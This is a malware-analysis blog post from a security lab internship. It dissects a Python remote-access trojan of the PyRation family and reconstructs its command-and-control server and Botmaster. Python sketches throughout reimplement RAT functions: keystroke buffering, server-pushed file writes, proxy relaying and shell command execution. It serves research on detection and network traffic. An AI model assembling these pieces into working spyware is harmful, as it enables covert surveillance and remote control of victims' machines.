This blog was authored by Tomas Nieponice on February 23, 2024
This work was made in the context of a 3-week winter cybersecurity internship by the author at the Stratosphere Laboratory, which involved learning about networking, malware reversing, programming and science communication. The internship was done under the supervision of Assist. prof. Sebastian Garcia, Ph.D., and Veronica Valeros, Eng.
This blog is about the technical analysis of a malware we believe to be a variant of the “PyRation” family, with the MD5 hash ‘67e77dcdbf046a0fd91a0bbb3e807831’ and SHA256 bba407734a2567c7e22e443ee5cc1b3a5780c9dd44c79b4a94d514449b0fd39a. The malware is a Python executable packaged as a Windows PE file, meaning it works only on Windows. The final objective of this project was to read and analyze network traffic from the operating malware.
Throughout the course of the blog, I will talk about how it spies and steals information from the target computer and also uses it to conduct anonymous browsing. I will also talk about how all these features are implemented and how it’s all structured via a client that works from the target computer, a server, and a Botmaster. Another topic will be how we got from the executable to a readable Python script by extracting the files from the .zip file and decompiling said files.
Reading and analyzing this malware meant reconstructing the missing parts and fixing the non-working ones. We had to fix the parts of the client that did not work and create the server and the Botmaster from scratch.
The first thing we did was unzip the .zip file that we received to analyze, in this case called original-malware.zip. Unzipping it gave us a new file called bba407734a, as shown in Figure 1.
After obtaining this file, we checked its contents to find out it is indeed a Python executable packaged as a Windows PE file. For this, we used the terminal command ‘strings -n 10 bba407734a | sort | uniq -c| sort -rn | less’.
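The shell pipeline above can be approximated in Python when the `strings` tool is not available. The following is a minimal sketch, not the command we ran: the function names are hypothetical, and it only looks for runs of printable ASCII (the default behavior of `strings` differs in small details such as how tabs are treated).

```python
import re
from collections import Counter


def printable_strings(data: bytes, min_len: int = 10) -> list[str]:
    """Return every run of printable ASCII that is at least min_len bytes long."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [match.decode("ascii") for match in re.findall(pattern, data)]


def most_common_strings(data: bytes, min_len: int = 10, top: int = 20):
    """Count repeated strings and order them by frequency,
    similar in spirit to `sort | uniq -c | sort -rn`."""
    return Counter(printable_strings(data, min_len)).most_common(top)


def report(path: str) -> None:
    """Print the most frequent strings of the file at `path`."""
    with open(path, "rb") as handle:
        for text, count in most_common_strings(handle.read()):
            print(f"{count:7d} {text}")
```

Calling `report("bba407734a")` on the extracted sample would print the most frequent strings; references to Python DLLs and PyInstaller in that list are the kind of hint that points to a packaged Python executable.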
After this, we used the tool pyinstxtractor [1] to extract all the files inside ‘bba407734a’, as shown in Figure 2. The output is a large number of files of many different types. Among these were .dll files, .pyd files, and, more importantly, .pyc files, which contain compiled Python bytecode. This meant that we could decompile these files into actual scripts.
As the terminal output suggests, we can use a decompiler on the .pyc files. In this case, we used decompyle3 [2]. Before decompiling, we need to be in the bba407734a_extracted folder, where we can create a folder called ‘decompiled’ to store all the output files, as shown in Figure 3.
After this, we can decompile the files using decompyle3 and save the results to the decompiled folder using ‘decompyle3 *.pyc -o decompiled’. This process produced many Python scripts. For our purposes, the only one we are going to use is “main.py”, which is the client side of the malware.
From this script, we found what library it uses for server-client connection, which is Socket.IO [3]. Socket.IO is a library that enables low-latency, bidirectional, and event-based communication between a client and a server.
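To make the event-based model concrete, here is a minimal sketch of a client built with the python-socketio package. It is not the code of the malware: the event names (`server_message`, `hello`), the handler, and the helper functions are hypothetical and only illustrate how handlers are attached to named events.

```python
def on_server_message(data):
    """Hypothetical handler: called whenever the server emits 'server_message'."""
    return {"received": data}


# Hypothetical event table: event name -> handler function.
HANDLERS = {"server_message": on_server_message}


def build_client(handlers=HANDLERS):
    """Create a Socket.IO client and register one handler per event name."""
    import socketio  # third-party: pip install "python-socketio[client]"

    sio = socketio.Client()
    for event_name, handler in handlers.items():
        sio.on(event_name, handler)  # same effect as the @sio.on(...) decorator
    return sio


def run(url):
    """Connect to the server, send one event, then block while events arrive."""
    sio = build_client()
    sio.connect(url)
    sio.emit("hello", {"role": "client"})  # client -> server event
    sio.wait()
```

The import sits inside `build_client` so that the handlers can be read and tested without the library installed. Both sides can emit events at any time, which is what makes the communication bidirectional.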
Once we had the decompiled Python code, we analyzed it and extracted all the core functionality of the malware, which is described in detail in the following subsections.
Screenshot
One of the program’s three ‘core’ functions is to take and send screenshots from the client to the server. By ‘core functions’, we don’t mean the most important, but that they run all the time without instructions from the server.
This function uses the Pillow [4] (or PIL) library to take screenshots. The interval between screenshots is 10 minutes by default. However, the client can access a configuration file on the server, so when it connects, it gets the latest value from the server. This way, an outdated client can update itself when run. When run on macOS, permissions are required for taking screenshots.
Lastly, the size limit for any data sent through the Socket.IO library is 1 MB, so screenshots above that size won’t be sent. Since the size varies depending on what is on the screen, a small resolution (600×600) was chosen for the screenshot, as shown in Figure 4, so as not to go over 1 MB in any case.
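The capture, resize, and size check described above can be sketched as follows. This is an illustration under assumptions, not the decompiled code: the function names are hypothetical, the PNG format is our choice for the example, and 1,000,000 bytes is assumed as the exact value of the 1 MB limit.

```python
import io

MAX_PAYLOAD_BYTES = 1_000_000  # assumed exact value of the 1 MB limit
SCREENSHOT_SIZE = (600, 600)   # resolution mentioned in the text


def fits_in_payload(data: bytes, limit: int = MAX_PAYLOAD_BYTES) -> bool:
    """Return True when the encoded screenshot is small enough to be sent."""
    return len(data) <= limit


def capture_screenshot_png(size=SCREENSHOT_SIZE) -> bytes:
    """Grab the screen, shrink it, and return the PNG-encoded bytes."""
    from PIL import ImageGrab  # third-party: pip install pillow

    image = ImageGrab.grab().resize(size)
    buffer = io.BytesIO()
    image.save(buffer, format="PNG")
    return buffer.getvalue()
```

A caller would only send the result of `capture_screenshot_png()` when `fits_in_payload(...)` returns True. Checking the encoded size rather than the resolution is what actually guards against the limit, since the number of bytes depends on what is on the screen.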
AV Detection
The second of the three ‘core’ functions is to detect whatever antiviruses are installed on the target computer at the moment of connection. This function uses the windows_tools [5] library to detect the installed antiviruses. The documentation for windows_tools shows that it detects 18 different types of antiviruses.
As this library is Windows-only, it can’t run on other operating systems. Because of this, before running the antivirus detection, it checks that the OS is Windows (Figure 5).
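A guard of this kind can be sketched in a few lines. The wrapper name `detect_antivirus` and its `system` parameter are hypothetical and exist only to make the check easy to test; the Windows-only import is deferred so that the function can be loaded on any OS.

```python
import platform


def detect_antivirus(system=None):
    """Return the installed antivirus products, or an empty list on non-Windows systems."""
    system = system or platform.system()
    if system != "Windows":
        return []  # the detection library only works on Windows
    # Imported here because the package cannot be used on other systems.
    from windows_tools.antivirus import get_installed_antivirus_software

    return get_installed_antivirus_software()
```

Passing `system="Linux"` or `system="Darwin"` exercises the early return without needing a Windows machine.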
As we wanted to run this function on macOS, we modified it to check in different directories for keywords that indicate there is an antivirus installed. Of course, we still check if the OS is macOS as shown in Figure 6, just in case.
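The idea of the macOS variant, looking for telltale names in a few directories, can be sketched like this. The keyword list, the directories, and the function names are hypothetical examples and not the values used in our modified client.

```python
import platform
from pathlib import Path

# Hypothetical examples; a real list would be longer.
AV_KEYWORDS = ("antivirus", "avast", "norton", "sophos")
SEARCH_DIRS = ("/Applications", "/Library/Application Support")


def find_antivirus_hints(directories=SEARCH_DIRS, keywords=AV_KEYWORDS):
    """Return paths whose name contains one of the keywords (case-insensitive)."""
    hits = []
    for directory in directories:
        root = Path(directory)
        try:
            entries = sorted(root.iterdir())
        except OSError:
            continue  # missing or unreadable directory: skip it
        for entry in entries:
            name = entry.name.lower()
            if any(keyword in name for keyword in keywords):
                hits.append(str(entry))
    return hits


def detect_antivirus_macos(system=None):
    """Only scan when running on macOS, which platform.system() reports as 'Darwin'."""
    system = system or platform.system()
    return find_antivirus_hints() if system == "Darwin" else []
```

This kind of name matching is a heuristic: it can miss products installed elsewhere and can flag unrelated folders, which is acceptable for a test setup.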
Keylogger
The last ‘core’ function of the malware records key presses and stores them in a variable. It relies on the Listener object of the pynput [6] library, which monitors and captures key presses across the applications running on the infected system. This process requires specific permissions on macOS. Because the malware is designed to run on Windows, these permissions are not an issue.
The function responsible for sending the key logs runs in a loop that executes every minute. Within this loop, a time check measures how long it has been since the last key press. If this duration exceeds 8 seconds, the key log data is sent to the server, as shown in Figure 7. As with the screenshot interval, the server can modify the 8-second value.
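The time check can be sketched as a small buffer that only releases its contents after typing has paused. The class and method names are hypothetical, and the wiring to the pynput Listener and to the one-minute loop is deliberately left out; the clock is injectable so the logic can be tested without waiting.

```python
import time


class KeyLogBuffer:
    """Hold key presses in memory and release them once typing has paused."""

    def __init__(self, idle_seconds=8.0, clock=time.monotonic):
        self.idle_seconds = idle_seconds  # the server could overwrite this value
        self._clock = clock
        self._keys = []
        self._last_press = None

    def record(self, key: str) -> None:
        """Store one key press and remember when it happened."""
        self._keys.append(key)
        self._last_press = self._clock()

    def flush_if_idle(self):
        """Return the buffered text and clear it if the pause is long enough, else None."""
        if not self._keys:
            return None
        if self._clock() - self._last_press <= self.idle_seconds:
            return None  # the user is probably still typing
        payload = "".join(self._keys)
        self._keys.clear()
        return payload
```

In this sketch, the periodic loop would call `flush_if_idle()` and send the result to the server only when it is not None. Waiting for a pause keeps a word or sentence together in one message instead of splitting it mid-typing.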
Notably, it is important to highlight that the malware refrains from locally storing the key log information, opting instead to maintain all gathered data on the remote server. This strategic decision enhances the malware’s covert nature and minimizes the risk of detection through local analysis, underscoring the sophistication and intent behind its design.
File Management Functions
In addition to the three ‘core’ functions described above, the client has functions that are triggered by a message from the server and processed in the bot. Two of the three functions are for file ‘management’. The first function downloads a file from the server to the bot. The only parameter needed is the filename, which is given by the server. First, the server sends the command ‘pull_file_http’ with the name as a parameter; then the malware requests this file from the server; finally, the server sends the file to the malware, as displayed in Figure 8.
The second file management function writes a completely new file on the infected machine. Its parameters are a filename and some content, both given by the server, as before. First, the server sends the message ‘save_file_from_socket’ with both parameters; then the bot saves the file on disk.
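The handling of ‘save_file_from_socket’ can be sketched as a plain function that receives the two parameters and writes the file. Only the command name comes from the client code; the function signature, the `base_dir` parameter, and the choice to strip directory components from the filename are assumptions made for this illustration.

```python
from pathlib import Path


def save_file_from_socket(filename, content, base_dir="."):
    """Write the content received from the server to disk and return the file path."""
    # Keep only the final name component so the file lands inside base_dir
    # (a choice made for this sketch, not taken from the malware).
    target = Path(base_dir) / Path(filename).name
    mode = "wb" if isinstance(content, bytes) else "w"
    with open(target, mode) as handle:
        handle.write(content)
    return target
```

In a Socket.IO client, a function like this would be registered as the handler for the event of the same name, so the server's message directly triggers the write.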
These two functions, coupled with an upcoming one, can serve the purpose of installing new malware or running scripts remotely.
Anonymous Browsing
The malware’s pivotal feature is its ability to use the target computer as a proxy, sending requests to any specified URL. This enables anonymous browsing for the attacker from an external device (Figure 9).
The server sends parameters, including URL, method, headers, and payload, prompting the malware to execute the request from the infected system. Upon successful connection, the output is relayed back to the server, facilitating discreet and remote browsing.
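The relay step can be sketched with the standard library alone. This is an assumption-laden illustration: the function names are hypothetical, and urllib is used here only to keep the example self-contained, which may differ from the HTTP library used by the actual client.

```python
import urllib.request


def build_request(url, method="GET", headers=None, payload=None):
    """Turn the parameters sent by the server into an HTTP request object."""
    data = payload.encode("utf-8") if isinstance(payload, str) else payload
    return urllib.request.Request(url, data=data, headers=headers or {}, method=method)


def relay_request(url, method="GET", headers=None, payload=None, timeout=10):
    """Perform the request from this machine and return what should go back to the server."""
    request = build_request(url, method, headers, payload)
    with urllib.request.urlopen(request, timeout=timeout) as response:
        return {"status": response.status, "body": response.read()}
```

Because the request leaves from the infected machine, the destination site sees that machine's IP address rather than the attacker's. Note that `urlopen` raises an exception for HTTP error statuses, so a fuller version would catch it and report the failure.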
Remote Command Execution
The last functionality this malware has is the capability to receive and execute command line commands. The specific command is given by the server and then executed. The output received is then sent back to the server as shown in Figure 10 and stored there. This function, coupled with the file writing functions, makes it possible to install new malware/software and run it as pleased.
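The execute-and-report step can be sketched with `subprocess`. The function name, the timeout, and the version string are hypothetical; only the existence of a special ‘version’ command comes from the client code.

```python
import subprocess

CLIENT_VERSION = "0.0-sketch"  # hypothetical value, not the real client version


def run_command(command: str, timeout: int = 30) -> str:
    """Run a command line and return its combined output as text."""
    if command == "version":
        # Special case: answer with the client version instead of running a process.
        return CLIENT_VERSION
    completed = subprocess.run(
        command, shell=True, capture_output=True, text=True, timeout=timeout
    )
    return completed.stdout + completed.stderr
```

The returned string is what would be emitted back to the server. Nothing is written to disk in this sketch, which matches the observation that the client keeps no local archive of command outputs.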
There is also a special command written in the code, called ‘version’, that checks the version of the client (most likely because the client obtained is not the final version and may be updated). As with the keylogging function, no local archive of command outputs is kept.
With all these functions explained, the functionality of the client can be seen in the diagram below, which can be accessed in full resolution here.
The whole malware operation consists of three crucial parts: the Botclient (called malware before), the server, and the Botmaster. These components are what make possible the back-and-forth information exchange that the malware requires to function properly and achieve its goal as spyware.
BotClient
The Botclient component of the malware operates within the confines of the targeted computer, initiating its execution whenever the original Python executable is launched. Its functionality becomes immediately apparent as it establishes a connection upon activation. An integral aspect of its operational design is the assignment of a distinct Session ID (SID) upon initiation. This unique identifier serves as a critical feature, enabling the malware to be distinguished from other infected computers within a network or system.
Server
The server does not exist in the original malware ZIP file, so we had to recreate it from scratch in order to have a functional setup. Therefore, most of the decisions on how to implement each function are my own decisions.
The server, also known as the Command and Control Server, functions remotely, operating from a computer located anywhere in the world. It can be executed directly from the attacker’s personal computer or from a remote server, which makes its deployment flexible. The server runs continuously so that it can receive and process data from the infected clients. One significant advantage lies in its automatic restarting mechanism, which allows local adjustments to its code without the need to break the connections already established. This is an automatic feature of Socket.IO: every time the file is saved, the code is reloaded. This ensures that modifications made to the server’s codebase are applied automatically.
Botmaster
The Botmaster also did not originally exist in the ZIP file of the malware. However, we need a way to send commands to the BotClients, and therefore, we estimated that a component like this would exist. I created the Botmaster from scratch.
The crucial role of the Botmaster within the context of this malware operation involves being the entity responsible for sending commands to any client connected to the central server. Serving as the orchestrator of the entire botnet, the Botmaster holds a position of command and control, directing the activities of the infected computers under their influence. This authority enables the Botmaster to issue commands that trigger specific actions such as remote command running and anonymous browsing.
To achieve our goal of being able to capture the network traffic of this malware, we had to reconstruct the components. This process involved fixing the client to make it work in our OS architecture, recreating the server, and also the Botmaster.
Fixing the Botclient
The first and most important thing in fixing the client was understanding how it worked. This meant understanding the purpose of each function it possessed. For this, a diagram was made to help visualize all the components of the client. For the last part, we modified the functions that were exclusive to Windows to test the client on macOS and successfully run them.
Note: on macOS, the malware still needs permission from the user to gather all the information, so running it there is of little use other than for testing.
(Re)creating server
With the client code as a starting point, we then needed to get a good understanding of the functionality of the Socket.IO library. This is required to know how and when to send each command and/or action, as well as how to receive them. With both the code and the library understood, we could then successfully implement the server.
At the moment of implementing the server-side code, we noticed that there was a recurring issue when trying to gather user input. We found that the Socket.IO library impedes user input from being entered (or at least there is no easy way to enter it). With this in mind, we created an easy way to enter user input which is via the Botmaster.
Creating the Botmaster
Because of the difficulty of getting Socket.IO to let the server take user input, we implemented the Botmaster: a specialized client whose only purpose is to take user input from the attacker, such as a command or a function, and send it to the server, which passes it on to the client for execution. After this process, the client sends back the output, and it is stored in the server (the response never gets to the Botmaster).
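The relay described above can be modeled in memory, without any networking, to show who talks to whom. Everything in this sketch is hypothetical: the class, the method names, and the use of plain callables to stand in for connected clients. In the real setup these calls are Socket.IO events.

```python
class RelayServer:
    """In-memory model of the server sitting between the Botmaster and the clients."""

    def __init__(self):
        self.clients = {}  # SID -> callable that executes a command and returns output
        self.results = []  # (sid, command, output) tuples kept on the server

    def register_client(self, sid, execute):
        """Remember a connected client under its Session ID."""
        self.clients[sid] = execute

    def handle_botmaster_command(self, sid, command):
        """Forward a Botmaster command to one client and store the client's answer.

        Nothing is returned: the output stays on the server and never
        travels back to the Botmaster.
        """
        execute = self.clients[sid]  # raises KeyError for an unknown SID
        output = execute(command)
        self.results.append((sid, command, output))
```

For example, after `server.register_client("sid-1", some_callable)`, a call to `server.handle_botmaster_command("sid-1", "whoami")` leaves the output in `server.results`, where the operator of the server can read it.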
The Botmaster itself may not be the actual way the real attacker uses to send commands as this was just our solution to the problem of getting user input. Nonetheless, since our goal is just to make it run, the solution is good enough.
To this point, we have only done one capture of the network traffic that has not been analyzed yet. It can be found here. The Stratosphere Laboratory is expected to follow up with more captures and analyses shortly.
In conclusion, the analysis and understanding of the malware executable from the PyRation family have provided valuable insights into its operations and functionalities. We’ve been able to understand and recreate the malware functionality from the original client’s code, as well as adapting it to run on multiple OSs. All files discussed in the blog are public in this GitHub repository: https://github.com/stratosphereips/Malware-CC-Recovery.